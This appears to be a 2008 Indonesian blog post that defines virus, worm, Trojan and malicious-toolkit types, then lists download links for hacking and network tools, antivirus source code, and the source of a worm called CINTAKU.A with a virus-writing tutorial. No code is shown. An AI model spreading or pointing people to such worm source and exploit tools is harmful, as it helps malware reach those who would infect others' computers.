Istilah “VIRUS” selalu digunakan sebagai suatu acuan umum untuk setiap malcode (program atau script yang dibuat dengan tujuan membahayakan atau merugikan sebuah system komputer), seperti worm,Trojan bahkan hoax yang sesungguhnya bukan sebuah virus komputer, berikut adalah beberapa jenis malcode tersebut:

->> Computer virus: merujuk pada program yang memiliki kemampuan untuk ber- reproduksi, menulari program lain dan menjadikan file-file program tertular sebagai file infector.

->> Computer worm: merujuk pada program independen yang memiliki kemampuan untuk ber-reproduksi, menulari system komputer dan walaupun mampu untuk menulari program lain namun tidak bertujuan untuk menjadikan file tertular tersebut sebagai suatu file infector.

->> Trojan horse: merujuk pada program independen yang tampaknya berguna, dan ketika dieksekusi, tanpa sepengetahuan pengguna, juga melaksanakan fungsi-fungsi yang bersifat destruktif dan merugikan.

->> Malicious toolkits: merujuk pada program yang didesain untuk membantu menciptakan program-program yang dapat membahayakan sebuah system komputer. Contoh dari program jenis ini adalah tool pembuat virus dan program yang dibuat untuk membantu proses cracking atau hacking.

Dari beberapa keterangan diatas dapat diperjelas bahwa worm adalah suatu algoritma atau program yang mereproduksi diri sendiri dari system ke system dengan menggunakan media penyimpanan atau suatu jaringan. Worm tidak menginfeksi file program lain dengan tujuan menjadikan file terinfeksi tersebut sebagai file infector.

T4 to Download

2008-02-18T10:53:00.001+07:00


TOOLS
=============================================================
[1] TOOLS LAMA TAPI TETEP BERGUNA :D (KaHT) - DOWNLOAD
[2] PUTTY - DOWNLOAD Link
[3] DOSHTTP V.1.0 - DOWNLOAD
[4] A-SQUARED FREE 3.1.0.20 - DOWNLOAD
[5] KISMET Wireless network detector
       FOR WINDOWS - DOWNLOAD
       FOR UNIX - DOWNLOAD
[6] HPING - DOWNLOAD
[7] KAHT Versi V - DOWNLOAD
[8] STEGANOGRAPHY - DOWNLOAD
[9] WATERMARK - DOWNLOAD

SOURCE CODE
=======================================================
//* ANTI-VIRUS *//

[1]  ANTI-VIRUS BRONTOK (Visual Basic 6.0) -  DOWNLOAD
[2]  POWER REMOVER 1.4 (Visual Basic 6.0) - DOWNLOAD
[3]  ANTI-VIRUS BRONTOK.C (Visual Basic 6.0) - DOWNLOAD
[4]  P3K DOCUMENT WORD DIARY.EXE (Visual Basic 6.0) - DOWNLOAD
[5]  ANTI-VIRUS KSPOOL (Visual Basic 6.0) - DOWNLOAD

//* VIRUS-WORM*//

[1]   CINTAKU.A [4k51k4] (Visual Basic 6.0) - DOWNLOAD
[2]  TUTORIAL VIRII (Visual Basic 6.0) - DOWNLOAD